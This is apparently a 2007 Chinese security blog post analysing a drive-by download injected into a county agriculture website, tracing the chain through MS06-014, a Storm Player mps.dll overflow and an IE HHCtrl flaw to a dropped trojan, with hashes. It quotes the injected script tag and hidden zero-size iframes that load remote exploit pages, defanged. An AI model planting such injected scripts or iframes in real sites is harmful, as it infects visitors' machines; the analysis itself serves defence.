某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码

某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码

endurer 原创
2007-09-25 第1版

在 Maxthon 中打开该网站，Maxthon 会假死几分钟。检查网页源文件，发现尾部被加入代码:
/---
＜script language=javascript src=hxxp://www.l*u**oyun**.com.cn/ly4/UploadAdpic/main.js＞＜/script＞
---/

hxxp://www.l*u**oyun**.com.cn/ly4/UploadAdpic/main.js 功能是检测 cookies 变量 starballlll，如果不存在则 创建此变量，然后尝试利用 MS06-014: msadco.dll的漏洞

《Microsoft 安全公告 MS06-014
Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码 (911562)
http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx》

成功则输出代码：
/---
＜iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/014.htm＞＜/iframe＞
---/
不成功则输出代码：
/---
＜iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/ying.htm＞＜/iframe＞
＜iframe width=0 height=0 src=hxxp://www.st*a**rba*ll.com.cn/wm/046.htm＞＜/iframe＞
---/

hxxp://www.st*a**rba*ll.com.cn/wm/014.htm 下载 help.exe，保存为 c:/windows/rundll32.exe

文件说明符 : D:/test/help.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-25 12:50:49
修改时间 : 2007-9-25 12:50:39
访问时间 : 2007-9-25 12:52:5
大小 : 162816 字节 159.0 KB
MD5 : cf984011a6fd417bad2e9d69c3e9584e
HSA1: 448FEA693D6B30AD2BC8166911A6195BE31137B4

WARNING -> VIRUS -> W32@Sircam_mm

包含:WJD2006

hxxp://www.st*a**rba*ll.com.cn/wm/ying.htm 利用了暴风影音2 mps.dll组件多个缓冲区溢出漏洞执行代码。

hxxp://www.st*a**rba*ll.com.cn/wm/046.htm 利用了IE Internet.HHCtrl ActiveX对象的拒绝服务漏洞执行代码。

受IE Internet.HHCtrl ActiveX对象的拒绝服务漏洞影响的系统：
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Internet Explorer在未初始化URL时调用Internet.HHCtrl.1 ActiveX对象的Click()方法触发空指针引用问题，可能导致IE崩溃。
参考：
IE Internet.HHCtrl ActiveX对象中拒绝服务漏洞
http://it.rising.com.cn/Channels/Safety/LatestHole/Hole_Windows/2006-07-25/1153791365d36644.shtml

以前也发现过利用此漏洞的东东:
ARP病毒加的网址利用雅虎通WebcamViewer控件溢出漏洞传播Worm.Delf.yqz
http://endurer.bokee.com/6321230.html
http://blog.csdn.net/Purpleendurer/archive/2007/06/11/1648346.aspx